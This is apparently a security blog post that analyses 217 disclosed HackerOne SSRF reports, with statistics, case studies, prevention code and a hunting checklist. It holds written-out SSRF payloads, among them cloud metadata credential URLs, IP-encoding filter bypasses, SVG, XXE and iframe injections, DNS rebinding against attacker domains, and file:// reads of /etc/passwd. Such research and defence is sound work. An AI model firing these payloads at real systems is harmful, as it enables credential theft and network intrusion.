[THE-BUG-HUNTER]
ONLINE
SSRFAdvanced25 min read2026-02-15
LANG:EN|FR

SSRF in the Wild: A Comprehensive Analysis of 200+ Real-World Server-Side Request Forgery Vulnerabilities

SSRF in the Wild: A Comprehensive Analysis of 200+ Real-World Server-Side Request Forgery Vulnerabilities
Reports Analyzed:
217
Platforms:
HackerOne
Research Timespan:
#SSRF#Cloud Security#AWS Metadata#DNS Rebinding#Blind SSRF#Filter Bypass#Webhooks#Mass Analysis#Infrastructure Security

SSRF in the Wild: A Comprehensive Analysis of 200+ Real-World Vulnerabilities

๐Ÿšจ CRITICAL RESEARCH FINDINGS
Dataset Analysis: 217 disclosed SSRF reports from HackerOne (2014โ€“2025)
Financial Impact: $92,757+ in disclosed bounties analyzed
Highest Single Bounty: $10,000 (GitLab Project Import SSRF)
Critical Discovery: Bypass techniques defeat SSRF protections in 18% of cases

๐Ÿ” Executive Summary

Server-Side Request Forgery (SSRF) has emerged as one of the most dangerous vulnerability classes in modern cloud-native applications, earning dedicated recognition as OWASP Top 10 A10:2021. Through analysis of 217 disclosed SSRF reports from HackerOne spanning 2014โ€“2025, this study exposes how attackers exploit applications to reach internal services, cloud metadata endpoints, and sensitive infrastructure.

Our analysis reveals that SSRF vulnerabilities have resulted in $92,757+ in disclosed bounties, with individual reports reaching $10,000. However, the true impact extends far beyond bug bounties: SSRF has enabled attackers to steal AWS credentials, gain root access to cloud instances, exfiltrate internal data, and pivot through entire internal networks. The Shopify Exchange SSRF alone was awarded $25,000 after the researcher demonstrated root access across all instances in an infrastructure subset.

๐ŸŽฏ What is SSRF?

Server-Side Request Forgery occurs when an attacker can induce the server-side application to make HTTP requests to an arbitrary domain or internal resource of the attacker's choosing. Unlike client-side attacks, SSRF leverages the server's network position and trust relationships.

๐Ÿ“‹ TYPICAL SSRF EXAMPLE
# Legitimate request โ€” fetches external URL for preview
POST /api/fetch-url HTTP/1.1
{"url": "https://example.com/article"}

# Attacker exploits to reach cloud metadata
POST /api/fetch-url HTTP/1.1
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}

# Attacker pivots to internal services
POST /api/fetch-url HTTP/1.1
{"url": "http://internal-api.corp:8080/admin/users"}
๐Ÿง  WHY SSRF IS SO DANGEROUS
1. Network trust abuse: The server sits inside the trusted network perimeter
2. Cloud metadata access: AWS/GCP/Azure metadata at 169.254.169.254 yields credentials
3. Chain escalation: SSRF frequently chains into RCE, credential theft, or full compromise
4. Filter evasion: Blocklist-based protections are consistently bypassed

๐Ÿ“Š Analysis Methodology

This study examines 217 disclosed SSRF reports from HackerOne's Hacktivity, focusing on:

ANALYSIS SCOPE

  • โ€ข Temporal analysis: Trends from 2014โ€“2025
  • โ€ข Attack patterns: Blind, full-read, DNS rebinding, bypass
  • โ€ข Infrastructure targets: AWS, GCP, internal services
  • โ€ข Financial impact: Bounty distributions

DATA SOURCES

  • โ€ข 217 HackerOne disclosed reports
  • โ€ข 77 unique bug bounty programs
  • โ€ข 181 unique security researchers
  • โ€ข CVE cross-references where available

๐Ÿ”ฅ Key Findings

1. Severity Distribution โ€” SSRF Skews High

๐Ÿ“ˆ SEVERITY BREAKDOWN (217 REPORTS)

40
CRITICAL
18.4%
50
HIGH
23.0%
75
MEDIUM
34.6%
36
LOW
16.6%
16
NONE/N/A
7.4%

Over 41% of all SSRF reports were rated high or critical, reflecting the severe impact of successful exploitation โ€” especially when cloud credentials or internal networks are exposed.

2. Temporal Trends โ€” Peak in 2020, Steady Presence

๐Ÿ“… REPORTS BY YEAR

20
2017
19
2018
24
2019
55
2020 (PEAK)
28
2021
30
2022
19
2023
16
2024
5
2025 (partial)

The 2020 spike (55 reports) correlates with accelerated cloud adoption and remote work. Despite declining disclosure counts in recent years, the severity and impact of SSRF reports has only increased โ€” particularly around AI/MCP tooling (2025) and library-level SSRF (libuv, undici, curl).

3. Top Targeted Programs

๐ŸŽฏ MOST TARGETED ORGANIZATIONS

Dept. of Defense20 reports
GitLab18 reports
Nextcloud15 reports
Stripo10 reports
HackerOne (own infra)7 reports
Shopify7 reports
Internet Bug Bounty7 reports
LINE5 reports
Lark Technologies5 reports
77 unique programs total217 reports

๐Ÿ”ฌ Attack Pattern Deep Dive

Pattern 1: Blind SSRF โ€” The Most Common Variant

๐Ÿ”‡ BLIND SSRF (35 reports โ€” 16% of dataset)

Definition: The attacker can trigger server-side requests but cannot see the response body. Confirmed via out-of-band interactions (DNS/HTTP callbacks).

# Step 1: Inject attacker-controlled URL
POST /api/webhook HTTP/1.1
{"callback_url": "https://attacker-burp-collaborator.net"}

# Step 2: Observe DNS/HTTP interaction in Burp Collaborator
# Confirms server made request from internal network

# Step 3: Pivot to port scanning
POST /api/webhook HTTP/1.1
{"callback_url": "http://127.0.0.1:6379"}  # Redis
# Response time difference reveals open ports
Real Example โ€” 8x8 Connect (#1875484): Blind SSRF via /api/v2/chats/image-check allowed internal port scanning. Entire API path was retired as a fix.
Real Example โ€” Cloudflare (#1467044): Blind SSRF on platform.dash.cloudflare.com through Sentry misconfiguration.

Pattern 2: Full-Read SSRF โ€” Maximum Impact

๐Ÿ“– FULL-READ SSRF (9 reports โ€” highest severity)

Definition: The attacker can read the full response from internal requests, enabling credential theft, data exfiltration, and complete infrastructure mapping.

# Attacker requests AWS metadata
GET /api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name

# Server returns AWS temporary credentials
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "wJalr...",
  "Token": "FwoGZX...",
  "Expiration": "2024-03-15T12:00:00Z"
}
Real Example โ€” Evernote (#1189367): Full-read SSRF leaked AWS metadata and enabled local file inclusion. Impact rated critical.
Real Example โ€” GitLab (#878779): Full-read SSRF on internal Grafana instance gave access to monitoring data.
Real Example โ€” Lark Docs (#1409727): $5,000 bounty for full-read SSRF via document import feature.

Pattern 3: Cloud Metadata Exploitation

โ˜๏ธ CLOUD METADATA ACCESS (25+ reports)

Target: The infamous 169.254.169.254 metadata endpoint present in AWS, GCP, and Azure.

# AWS Instance Metadata Service (IMDSv1 โ€” no authentication required)
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/user-data/

# GCP Metadata (requires header)
http://metadata.google.internal/computeMetadata/v1/

# Azure Metadata
http://169.254.169.254/metadata/instance?api-version=2021-02-01
Real Example โ€” HackerOne (#2262382): SSRF via iframe injection in analytics PDF export exposed AWS credentials. Awarded $25,000. CVSSv3 10.0 (Critical).
Real Example โ€” DoD (#1624140): SSRF to read AWS metadata via URL parameter. AWS credentials and instance data exposed.
Real Example โ€” Snapchat (#530974): SSRF via DNS rebinding in headless Chrome fetched Google Cloud metadata and minted service tokens.

Pattern 4: DNS Rebinding Attacks

๐Ÿ”„ DNS REBINDING (7 reports)

Technique: Attacker controls a domain's DNS records, initially resolving to a public IP (passing validation), then switching to an internal IP (127.0.0.1 or 169.254.169.254) during the actual request.

# DNS Rebinding attack flow: 1. Attacker submits: http://evil.attacker.com/payload 2. First DNS lookup (validation): evil.attacker.com โ†’ 1.2.3.4 (public IP โ€” passes check) 3. DNS TTL expires immediately (TTL=0) 4. Second DNS lookup (actual request): evil.attacker.com โ†’ 127.0.0.1 (internal!) 5. Server connects to localhost, bypassing all IP-based SSRF filters
Real Example โ€” Burp Suite MCP (#3176157): DNS rebinding in Burp Suite MCP Server bypassed origin validation to access internal networks and cloud metadata. $2,000 bounty.
Real Example โ€” ConcreteCMS (#1369312): DNS rebinding bypassed AWS metadata SSRF mitigations to fetch IAM keys.
Real Example โ€” Nextcloud (#2115212): DNS pin middleware defeated through rebinding.

Pattern 5: SSRF Filter Bypass Techniques

๐Ÿ”“ SSRF FILTER/BLOCKLIST BYPASS (21+ reports with "bypass" in title)

Key insight: SSRF protections are consistently evaded. Blocklist approaches are fundamentally flawed.

# Bypass Technique 1: IPv6 mapped to IPv4
http://[::ffff:127.0.0.1]/
http://[0:0:0:0:0:ffff:169.254.169.254]/

# Bypass Technique 2: Decimal/Octal/Hex IP encoding
http://2130706433/         # Decimal for 127.0.0.1
http://0x7f000001/         # Hex for 127.0.0.1
http://017700000001/       # Octal for 127.0.0.1
http://0177.0.0.1/         # Mixed octal

# Bypass Technique 3: URL parsing inconsistencies
http://evil.com@127.0.0.1/  # Credential host confusion
http://127.0.0.1#@evil.com  # Fragment injection
http://127.0.0.1%00@evil.com  # Null byte

# Bypass Technique 4: Redirect chains
http://evil.com/redirect?to=http://169.254.169.254/

# Bypass Technique 5: Trailing dot in domain
http://internal-service.  # Trailing dot bypasses deny lists

# Bypass Technique 6: Protocol-relative URL
//127.0.0.1/admin
Real Example โ€” Security (#2301565): IPv6-mapped-to-IPv4 bypass defeated anti-SSRF protections to reach AWS EC2 metadata. $2,500 bounty.
Real Example โ€” Nextcloud (#1702864): Alphanumeric SSRF payloads bypassed IP filter validation. $250 bounty.
Real Example โ€” Stripe Smokescreen (#1410214): Trailing dot appended to domains bypassed the deny_list feature.
Real Example โ€” libuv (#2429894): Hostname truncation to 256 chars enabled addresses like 0x00007f000001 to bypass validation. $4,860 bounty.

Pattern 6: SSRF via File Upload & Import Features

๐Ÿ“ FILE/IMPORT SSRF (24 reports)

Vectors: SVG uploads, PDF generators, URL-based file imports, video processing, XML/XSLT parsing.

<!-- SVG-based SSRF -->
<svg xmlns="http://www.w3.org/2000/svg">
  <image href="http://169.254.169.254/latest/meta-data/" />
</svg>

<!-- XXE-based SSRF via XML upload -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>

<!-- PDF generator SSRF via HTML injection -->
<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
Real Example โ€” GitLab (#826361): SSRF via remote_attachment_url on project import Note. $10,000 bounty โ€” highest in dataset.
Real Example โ€” TikTok (#1062888): External SSRF and local file read via vulnerable FFmpeg HLS processing in video uploads. $2,727 bounty.
Real Example โ€” Uber (#448598): SSRF via XXE Out-of-Band in usuppliers.uber.com file upload.
Real Example โ€” Shopify (#223203): SVG-based SSRF โ€” $500 bounty.

Pattern 7: SSRF via Webhooks & Integrations

๐Ÿ”— WEBHOOK/INTEGRATION SSRF (9 reports)

Root cause: Applications that allow users to configure webhook URLs or integration endpoints without proper URL validation.

# Webhook configuration pointing to internal service
POST /api/integrations/webhook
{
  "name": "My Integration",
  "url": "http://169.254.169.254/latest/meta-data/",
  "events": ["order.created"]
}

# When event fires, server sends request to attacker-controlled destination
# or to internal infrastructure
Real Example โ€” Omise (#508459): SSRF in webhooks leaked AWS private keys.
Real Example โ€” Helium (#1055823): Custom HTTP integration endpoint pointed to http://169.254.169.254/latest/meta-data. $500 bounty.
Real Example โ€” Dynatrace (#643278): Custom integration webhook disclosed AWS metadata. $1,500 bounty.

๐Ÿ’ฐ Financial Impact Analysis

๐Ÿ’ธ BOUNTY DISTRIBUTION

$92,757+
TOTAL BOUNTIES
$1,819
AVG BOUNTY (non-zero)
76.5%
REPORTS WITH $0 BOUNTY

Highest Bounty Reports:

CRITICAL

GitLab Project Import SSRF

$10,000
Report #826361
Full-read SSRF via remote_attachment_url
HIGH

Reddit Matrix SSRF

$6,000
Report #1960765
Blind SSRF exfiltrated internal service data
HIGH

Kubernetes Cloud Controller SSRF

$5,000
Report #776017
Half-blind SSRF upgradeable to full crafted HTTP
CRITICAL

Lark Docs Import SSRF

$5,000
Report #1409727
Full-read SSRF in document import
HIGH

Apache UNC SSRF (CVE-2024-38472)

$4,920
Report #2585385
Windows UNC path SSRF leaking NTLM hashes
HIGH

libuv Domain Lookup SSRF

$4,860
Report #2429894
Hostname truncation enabling SSRF filter bypass
๐Ÿ’Ž NOTABLE MENTION: Shopify Exchange SSRF โ†’ ROOT ($25,000)

Report #341876 โ€” @0xacb exploited SSRF in Shopify Exchange's screenshotting functionality to access cloud metadata, then pivoted to gain root access to every container in the infrastructure subset. Shopify responded within one hour, disabled the service, and audited all infrastructure subsets. Awarded $25,000 as equivalent to a Shopify Core RCE. This report bounty amount is not reflected in the bounty section but represents the highest-value SSRF finding in the dataset.

๐Ÿญ Industry Impact Analysis

๐Ÿ›๏ธ GOVERNMENT & DEFENSE

Reports: 20 (most targeted sector)
Avg Bounty: $0 (VDP โ€” no monetary rewards)
Common Impacts:
  • โ€ข AWS metadata exposure on military systems
  • โ€ข Internal network scanning
  • โ€ข IP address and infrastructure enumeration
Critical: DoD systems consistently vulnerable to SSRF via PDF generators, xmlrpc.php, and URL parameters

๐Ÿ’ป DEVTOOLS & INFRASTRUCTURE

Reports: 18 (GitLab) + 7 (Shopify) + more
Avg Bounty: $2,000+
Common Impacts:
  • โ€ข CI/CD pipeline compromise
  • โ€ข Project import exploitation
  • โ€ข Internal Grafana/monitoring access
Notable: GitLab paid $10,000 for project import SSRF, Shopify paid $25,000 for Exchange SSRF โ†’ root

๐Ÿ“ง COMMUNICATION & MESSAGING

Reports: Slack (4), Nextcloud (15), LINE (5)
Avg Bounty: $750
Common Impacts:
  • โ€ข Internal network proxying via TURN servers
  • โ€ข Blind SSRF via mail server settings
  • โ€ข Slash command abuse for internal requests
Notable: Slack TURN server allowed TCP/UDP proxying to internal network ($3,500)

๐Ÿ”ง OPEN SOURCE LIBRARIES

Reports: curl (3), libuv, undici, Node.js ecosystem
Impact Multiplier: Millions of downstream users
Common Issues:
  • โ€ข URL parsing inconsistencies
  • โ€ข Hostname truncation bugs
  • โ€ข Protocol-relative URL handling
Critical: A single library SSRF (e.g., curl, undici) affects thousands of downstream applications

๐Ÿ”ฌ Technical Deep Dive: The SSRF Kill Chain

โš ๏ธ SSRF EXPLOITATION LADDER

Level 1: External Service Interaction (Low Impact)

Confirm SSRF exists via DNS/HTTP out-of-band callback. Proves the server makes requests but no data exfiltrated.

Verify: Server makes DNS query to attacker-controlled domain Impact: Information disclosure (server IP), proof of vulnerability
Level 2: Internal Port Scanning (Medium Impact)

Enumerate internal services by measuring response time or error differences across ports.

Detect: Response time for http://127.0.0.1:22 (open) vs http://127.0.0.1:12345 (closed) Impact: Internal network mapping, service discovery
Level 3: Cloud Credential Theft (High Impact)

Access cloud metadata service to steal temporary IAM credentials.

Target: http://169.254.169.254/latest/meta-data/iam/security-credentials/ Impact: AWS account access, S3 bucket manipulation, EC2 control
Level 4: Remote Code Execution (Critical Impact)

Chain SSRF with internal services (Redis, Docker API, Kubernetes) to achieve code execution.

Chain: SSRF โ†’ Docker API (no auth) โ†’ Container escape โ†’ Root access Real: Shopify Exchange SSRF โ†’ Root on all instances (#341876) Real: Uber SSRF โ†’ Internal Docker API access (#366638)

๐Ÿ”ฅ Case Study Spotlight: Shopify Exchange โ†’ Root Access

๐Ÿ† REPORT #341876 โ€” The $25,000 SSRF

Reporter: @0xacb
Target: Shopify Exchange (screenshot functionality)
Impact: Root access to every container in an infrastructure subset
Bounty: $25,000 (classified as Shopify Core RCE equivalent)
Attack Chain:
  1. 1. Discovered SSRF in Exchange's screenshotting service
  2. 2. Used SSRF to reach cloud metadata endpoint (169.254.169.254)
  3. 3. Retrieved IAM role credentials from metadata
  4. 4. Used credentials to access internal services and buckets
  5. 5. Achieved root access across all containers in the infrastructure subset
Shopify's Response (exemplary):
Within 1 hour: disabled the vulnerable service. Began auditing all infrastructure subsets. Deployed a metadata concealment proxy across all infrastructure. Disabled access to internal IPs in all subsets.

๐Ÿ”ฅ Case Study Spotlight: HackerOne's Own SSRF โ†’ $25,000

๐Ÿ† REPORT #2262382 โ€” AWS Credentials via PDF Export

Reporter: @mega7 (h--1)
Target: HackerOne Analytics PDF Reports
Impact: AWS credential theft, potential account takeover, arbitrary command execution
Bounty: $25,000 | CVSSv3: 10.0 (Critical)
Attack Chain:
  1. 1. Injected an <iframe> tag into the template element of analytics report PDF generation
  2. 2. PDF renderer fetched the iframe URL server-side
  3. 3. Pointed iframe to http://169.254.169.254/latest/meta-data/iam/security-credentials/
  4. 4. Generated PDF contained AWS temporary credentials in cleartext
  5. 5. Credentials could manipulate AWS resources, cause data loss, or takeover accounts
HackerOne's Response:
Reproduced and verified within hours. Fix deployed to production. Regression tests added. Forensic investigation found no evidence of prior exploitation. Rated CVSSv3 10 (Critical).

๐Ÿ›ก๏ธ Prevention Strategies

๐Ÿ”’ DEFENSE IN DEPTH โ€” SSRF PROTECTION LAYERS

1. Network-Level Isolation (Most Effective)
Deploy applications in network segments that cannot reach metadata endpoints or sensitive internal services.
# AWS: Enforce IMDSv2 (requires token-based access)
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Deploy metadata concealment proxy (like Shopify did)
# Block 169.254.169.254 at the network level via iptables/security groups

# Kubernetes: Block metadata via NetworkPolicy
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-metadata
spec:
  podSelector: {}
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32
2. Application-Level URL Validation (Allowlist Only)
Never use blocklists. Use strict allowlists for protocols, domains, and IP ranges.
import ipaddress
import urllib.parse
import socket

ALLOWED_SCHEMES = {'https'}
BLOCKED_NETWORKS = [
    ipaddress.ip_network('127.0.0.0/8'),       # Loopback
    ipaddress.ip_network('10.0.0.0/8'),         # Private
    ipaddress.ip_network('172.16.0.0/12'),      # Private
    ipaddress.ip_network('192.168.0.0/16'),     # Private
    ipaddress.ip_network('169.254.0.0/16'),     # Link-local (metadata!)
    ipaddress.ip_network('0.0.0.0/8'),          # Special
    ipaddress.ip_network('::1/128'),            # IPv6 loopback
    ipaddress.ip_network('::ffff:0:0/96'),      # IPv4-mapped IPv6
]

def validate_url(url: str) -> bool:
    parsed = urllib.parse.urlparse(url)
    
    # 1. Allowlist protocol
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False
    
    # 2. Resolve hostname, validate resolved IP (not hostname!)
    try:
        resolved_ip = socket.getaddrinfo(parsed.hostname, None)[0][4][0]
        ip = ipaddress.ip_address(resolved_ip)
    except (socket.gaierror, ValueError):
        return False
    
    # 3. Block private/internal IPs
    for network in BLOCKED_NETWORKS:
        if ip in network:
            return False
    
    # 4. Re-validate after redirect (critical for DNS rebinding!)
    return True
3. DNS Rebinding Protection
Resolve DNS once, pin the IP, and validate both before AND after the connection is established.
# DNS pinning strategy
def safe_fetch(url: str) -> bytes:
    parsed = urllib.parse.urlparse(url)
    
    # Step 1: Resolve and validate
    resolved_ip = resolve_and_validate(parsed.hostname)
    
    # Step 2: Connect directly to the resolved IP (bypass DNS)
    # This prevents DNS rebinding between validation and request
    response = requests.get(
        url,
        headers={'Host': parsed.hostname},
        allow_redirects=False,  # Handle redirects manually!
        timeout=5,
        # Force connection to validated IP
        # via custom adapter or socket override
    )
    
    # Step 3: Validate any redirect URLs before following
    if response.is_redirect:
        redirect_url = response.headers['Location']
        validate_url(redirect_url)  # Re-validate!
    
    return response.content
4. Dedicated Egress Proxy (Smokescreen Pattern)
Route all outgoing HTTP requests through a dedicated proxy that enforces URL policies centrally.
# Smokescreen-style egress proxy (used by Stripe, Shopify)
# All outbound HTTP from the application routes through this proxy
# Proxy enforces:
#   - No connections to internal IP ranges
#   - No connections to cloud metadata endpoints
#   - No connections to denied domains
#   - DNS resolution happens in the proxy (prevents rebinding)

proxy_config:
  deny_ranges:
    - "127.0.0.0/8"
    - "10.0.0.0/8"
    - "169.254.0.0/16"
    - "172.16.0.0/12"
    - "192.168.0.0/16"
  deny_domains:
    - "*.internal"
    - "metadata.google.internal"

๐Ÿงช Testing Methodology for Bug Hunters

๐Ÿ› ๏ธ SSRF HUNTING CHECKLIST

Step 1: Identify Input Vectors
Look for any parameter accepting URLs, hostnames, or IP addresses: webhooks, file imports, URL previews, SVG uploads, PDF generators.
Step 2: Confirm with OOB
Use Burp Collaborator or interactsh to confirm the server makes external requests. Check both DNS and HTTP callbacks.
Step 3: Test Internal Access
Try reaching 127.0.0.1, 169.254.169.254, and internal hostnames. Measure response time differences for port scanning.
Step 4: Bypass Filters
Try IPv6, decimal IP, hex IP, DNS rebinding, URL encoding, redirect chains, protocol-relative URLs, and trailing dots.
Step 5: Escalate Impact
If you can reach cloud metadata, extract IAM credentials. Check for Redis, Docker API, Kubernetes API on internal ports.
Step 6: Document Thoroughly
Show the full attack chain. Demonstrate business impact. Include reproduction steps, screenshots, and affected infrastructure.
๐Ÿ“‹ COMMON SSRF PARAMETERS TO TEST
url, uri, src, href, link, callback, redirect, proxy, endpoint
dest, target, path, host, domain, site, page, feed, webhook
image_url, icon_url, avatar_url, logo_url, preview_url
import_url, fetch_url, load_url, download_url, file_url
next, return, continue, forward, redir, out, view, show
๐Ÿ”„ SSRF PAYLOAD CHEATSHEET
# Cloud metadata endpoints
http://169.254.169.254/latest/meta-data/          # AWS
http://metadata.google.internal/computeMetadata/v1/ # GCP
http://169.254.169.254/metadata/instance            # Azure

# Internal services
http://127.0.0.1:6379/       # Redis
http://127.0.0.1:9200/       # Elasticsearch
http://127.0.0.1:2375/       # Docker API
http://127.0.0.1:5985/       # WinRM
http://127.0.0.1:8500/       # Consul

# Read local files
file:///etc/passwd
file:///proc/self/environ
file:///proc/net/tcp

# IP encoding tricks
http://0x7f000001/            # Hex
http://2130706433/            # Decimal
http://017700000001/          # Octal
http://[::ffff:127.0.0.1]/   # IPv6 mapped
http://127.1/                 # Shortened
http://0/                     # Zero

๏ฟฝ Researcher & Geographic Patterns

๐Ÿ† TOP SSRF HUNTERS

@orange3 reports
@supr4s3 reports
@jin0ne3 reports
@jobert3 reports
@edoverflow3 reports
@a_d_a_m2 reports
@lu3ky-132 reports
@mike122 reports

Notable: @orange (Orange Tsai) is a world-renowned SSRF researcher known for bypassing URL parsers. @jobert (HackerOne co-founder) appears in both SSRF and IDOR top hunters. @edoverflow specializes in infrastructure-level vulnerabilities.

๐ŸŒ RESEARCHER DEMOGRAPHICS

Dataset Overview
Unique Researchers181
Total Reports217
Avg Reports per Researcher1.2
Key Patterns
โ€ข SSRF is specialist territory: Unlike IDOR, most SSRF reporters (83%) submitted only 1 report โ€” deep technical skill required
โ€ข Cross-class hunters: @jobert and @a_d_a_m appear in both IDOR and SSRF top hunters
โ€ข Infrastructure focus: Top SSRF hunters tend to specialize in network/cloud security rather than web app logic
โ€ข Research-driven: Many SSRF reports reference novel bypass techniques from academic papers or conference talks (e.g., Orange Tsai's BlackHat presentations)
Geographic Diversity
โ€ข Researchers from 50+ countries across 6 continents
โ€ข Strong representation from Asia (Taiwan, India, Japan) and Europe (France, Germany, Netherlands)
โ€ข North America and South America also well represented

๏ฟฝ๐Ÿ”ฎ Future Trends and Emerging Threats

โš ๏ธ EMERGING SSRF THREAT LANDSCAPE

1. AI/MCP Tooling SSRF (2025 trend)

The rise of Model Context Protocol (MCP) servers introduces new SSRF surfaces. AI tools that make HTTP requests on behalf of users are vulnerable to DNS rebinding and lack origin validation.

Example: Burp Suite MCP Server (#3176157) โ€” DNS rebinding SSRF enabled internal network access via the send_http1_request tool.

2. Supply Chain SSRF via Libraries

SSRF vulnerabilities in foundational libraries (curl, libuv, undici) create supply chain risk affecting millions of downstream applications simultaneously.

Examples: CVE-2024-38472 (Apache), libuv hostname truncation, undici pathname SSRF โ€” all affected massive ecosystems.

3. Kubernetes & Container Orchestration SSRF

Kubernetes API servers, cloud controllers, and admission webhooks introduce SSRF opportunities unique to container platforms.

Example: Kubernetes (#1544133) โ€” Hijacked aggregated API server returning 30X redirects enabled SSRF to internal endpoints.

4. PDF/Document Generation as Attack Surface

Server-side PDF generators (wkhtmltopdf, Puppeteer, headless Chrome) consistently ignore Content Security Policy and enable SSRF through HTML injection.

Pattern: Inject <iframe>, <img>, or <script> into user-controlled content โ†’ PDF renderer fetches internal URLs server-side.

๐Ÿข Recommendations for Organizations

๐Ÿšจ IMMEDIATE ACTIONS (0-30 days)

  1. 1. Enable IMDSv2 on all AWS instances (blocks unauthenticated metadata access)
  2. 2. Audit URL-accepting endpoints โ€” webhooks, imports, previews, PDF generators
  3. 3. Block 169.254.169.254 at the network level via security groups/iptables
  4. 4. Disable unnecessary protocols โ€” block file://, gopher://, dict:// schemes

โšก MEDIUM-TERM (1-6 months)

  1. 1. Deploy an egress proxy (Smokescreen or similar) for all outbound HTTP
  2. 2. Implement DNS pinning to prevent rebinding attacks
  3. 3. Replace blocklists with allowlists for all URL validation
  4. 4. Add SSRF tests to CI/CD โ€” automated scanning of URL-accepting endpoints

๐ŸŽฏ LONG-TERM (6+ months)

  1. 1. Zero-trust networking โ€” microservices should authenticate all internal requests
  2. 2. Metadata concealment proxy across all infrastructure (Shopify model)
  3. 3. Red team exercises specifically targeting SSRF attack chains
  4. 4. Supply chain auditing โ€” monitor dependencies for URL-parsing vulnerabilities

๐ŸŽฏ Conclusion

๐Ÿ“Š FINAL ANALYSIS

SSRF has evolved from a curiosity to one of the most critical vulnerability classes in cloud-native environments. Our analysis of 217 HackerOne reports reveals a clear pattern: SSRF protections are consistently defeated, cloud metadata remains the primary escalation target, and the attack surface continues to expand with AI tooling, container orchestration, and library-level vulnerabilities.

Key Takeaways:
  1. 1. Blocklists fail: 18% of reports involve bypassing existing SSRF protections. Allowlists and network isolation are the only reliable defenses.
  2. 2. Cloud metadata is the crown jewel: 25+ reports target 169.254.169.254 โ€” enforce IMDSv2 and block metadata at the network level.
  3. 3. Blind SSRF is underestimated: 35 reports demonstrate that even without response body access, attackers achieve significant impact through port scanning and service interaction.
  4. 4. SSRF chains are devastating: The jump from SSRF to RCE (Shopify $25,000) or full credential theft (HackerOne $25,000) represents existential organizational risk.
  5. 5. New attack surfaces emerge constantly: MCP servers, AI tooling, and container platforms introduce SSRF vectors that didn't exist two years ago.
The Path Forward:

Organizations must adopt a defense-in-depth posture: network isolation blocks the escalation path, egress proxies centralize URL policy enforcement, IMDSv2 eliminates the easiest metadata attack, and allowlist validation catches what slips through. No single layer is sufficient โ€” the combination is what stops SSRF exploitation chains before they reach critical assets.

For Bug Hunters:

SSRF remains one of the most rewarding bug classes to hunt. The highest payouts come from demonstrating the full exploitation chain โ€” don't stop at proving the server makes requests. Show the AWS credentials. Map the internal network. Prove the impact. A well-chained SSRF report can easily earn $5,000โ€“$25,000 at top programs.

This analysis is based on 217 publicly disclosed SSRF vulnerability reports from HackerOne, spanning 77 unique bug bounty programs from 2014 to 2025. It represents a subset of actual SSRF vulnerabilities โ€” many critical SSRF findings remain undisclosed or were reported through private programs.

This research was mainly conducted with the assistance of AI to enhance clarity and structure.

[SHARE_THIS_POST]
โ†’ Help spread knowledge in the cybersecurity community